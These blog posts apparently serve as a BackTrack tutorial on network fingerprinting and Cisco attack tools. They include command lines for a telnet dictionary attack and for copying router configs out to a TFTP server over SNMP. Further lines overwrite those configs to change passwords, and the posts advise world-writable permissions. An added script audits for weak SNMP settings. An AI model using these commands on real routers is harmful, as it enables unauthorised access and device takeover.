Tuesday, December 6, 2011

xprobe2

Information Gathering -> Network Analysis -> OS fingerprinting -> xprobe2

While p0f does passive OS fingerprinting, xprobe2 does active fingerprinting. It tries to identify the OS with several approaches: fuzzy signature matching, probabilistic guesses, reporting multiple matches simultaneously, and a signature database. These mainly rely on network protocols like ICMP, TCP and UDP. Besides that, it is capable of port scanning as well.

It has quite a few options, but it's quite easy to run with the default settings:

root@bt:~# xprobe2 192.168.1.11


It's not really accurate, probably because its database is not up to date.

p0f

Information Gathering -> Network Analysis -> OS fingerprinting -> p0f

p0f = Passive OS Fingerprinting

p0f is capable of identifying OS fingerprints passively. It does this by sniffing and analyzing TCP packets, so whether we connect somewhere or someone else connects to us, it can listen to the traffic passively without generating any traffic of its own. It can detect OSes in the following ways:
- SYN mode (who connects to us) - this is the default
- SYN + ACK mode - where we connect to
- RST+ mode - where we can't connect
- hosts whose traffic we can see

The default fingerprint database can be found in the /etc/p0f/ folder.

Examples:

root@bt:~# p0f -h <- help
root@bt:~# p0f -i eth1 <- listen on eth1 interface
root@bt:~# p0f -i eth1 -A <- SYN ACK mode
root@bt:~# p0f -i eth1 -A -l -t <- one line output and timestamp

For me it didn't really work out, no matter what I visited.


Official website: http://lcamtuf.coredump.cx/p0f.shtml

Sunday, December 4, 2011

cisco-torch

Vulnerability Assessment -> Network Assessment -> Cisco Tools

This is an all-in-one tool for finding Cisco passwords, vulnerabilities and fingerprints, and for downloading configurations. It can scan the telnet, SSH, HTTP, NTP and SNMP services and run a dictionary attack against them. The app's configuration file is called torch.conf; the parameters (password file, TFTP server IP address, etc.) need to be set there before running it.

Usage, examples:

./cisco-torch.pl <- help

./cisco-torch.pl -A 192.168.80.138 <- running all tests

./cisco-torch.pl -t -b 192.168.80.138 <- dictionary attacking against telnet


Official Website: http://www.hackingciscoexposed.com/?link=tools

Friday, December 2, 2011

copy-router-config / merge-router-config

Vulnerability Assessment -> Network Assessment -> Cisco Tools

This tool copies a Cisco router's running configuration over SNMP to a TFTP server, provided we have the RW community string. This string can be discovered, for example, with the Cisco Auditing Tool. My TFTP server is running on the Backtrack machine.

Usage:

chmod 777 copy-router-config.pl <- By default we don't have permission to run it, so give ourselves permission.

root@bt:/pentest/cisco/copy-router-config# ./copy-router-config.pl 192.168.80.137 192.168.80.128 private

The first IP is the router, the second is the TFTP server. The configuration is saved to a file called "pwnd-router.config".

The counterpart of this tool is merge-router-config.pl, which copies a config file into the router's running config. Its usage is similar:

chmod 777 merge-router-config.pl <- Again, by default we don't have permission to run it, so give ourselves permission.

root@bt:/pentest/cisco/copy-router-config# ./merge-router-config.pl 192.168.80.137 192.168.80.128 private

The first IP is the router, the second is the TFTP server. The configuration is copied from a file called "pwnd-router.config".

This can be used to change the passwords on a router by overwriting its configuration.


The Cisco router configuration relevant to this is:

snmp-server community private RW
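As an added example (not part of the original post or of the tools above), a small audit script that flags this kind of SNMP setting in a saved Cisco config: an RW community, a default or guessable string, or a community with no access-list. The config fragment is constructed, and the list of weak strings is an assumption.

```python
import re

# Constructed sample of a Cisco running-config fragment (not from a real device)
SAMPLE_CONFIG = """\
hostname edge-router
!
snmp-server community private RW
snmp-server community public RO
snmp-server community s3cr3t-mon RO 10
snmp-server community ops-rw RW 20
!
access-list 10 permit 192.0.2.10
"""

# Assumed list of community strings that ship as defaults or sit in every wordlist
WEAK_COMMUNITIES = {"public", "private", "cisco", "admin", "secret"}

# snmp-server community <string> [view <name>] [RO|RW] [<acl number or name>]
SNMP_LINE = re.compile(
    r"^snmp-server community (?P<name>\S+)(?:\s+view\s+\S+)?"
    r"(?:\s+(?P<mode>RO|RW))?(?:\s+(?P<acl>\S+))?\s*$",
    re.IGNORECASE,
)


def audit_snmp_communities(config_text):
    """Return (community, finding) tuples for risky SNMP v1/v2c community lines."""
    findings = []
    for line in config_text.splitlines():
        m = SNMP_LINE.match(line.strip())
        if not m:
            continue
        name = m.group("name")
        mode = (m.group("mode") or "RO").upper()  # IOS defaults to RO when omitted
        acl = m.group("acl")
        if mode == "RW":
            findings.append((name, "RW community allows config download/overwrite via TFTP"))
        if name.lower() in WEAK_COMMUNITIES:
            findings.append((name, "default or guessable community string"))
        if acl is None:
            findings.append((name, "no access-list restricting SNMP source addresses"))
    return findings


if __name__ == "__main__":
    for community, finding in audit_snmp_communities(SAMPLE_CONFIG):
        print(f"{community}: {finding}")
```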

Thursday, December 1, 2011

Backtrack basics 11. - TFTP service

Backtrack 5 doesn't have TFTP installed by default as BT4 did, so we need to install it:

root@bt# apt-get install tftpd

Starting the service:

root@bt:~# in.tftpd /srv/tftp/

root@bt:~# netstat -a | grep tftp
udp 0 0 *:tftp *:*


After that we can start to use it.

#update

It's better to install the "atftpd" package instead; this TFTP server has more options, for example it can run as a standalone daemon rather than as part of the "inetd" process. The TFTP folder should be readable and writable by everyone.

The tool's configuration file can be found in "/etc/inetd.conf".

root@bt# apt-get install atftpd

Starting the service:

root@bt:~# in.tftpd --daemon /tftpboot/

root@bt:~# netstat -a | grep tftp
udp 0 0 *:tftp *:*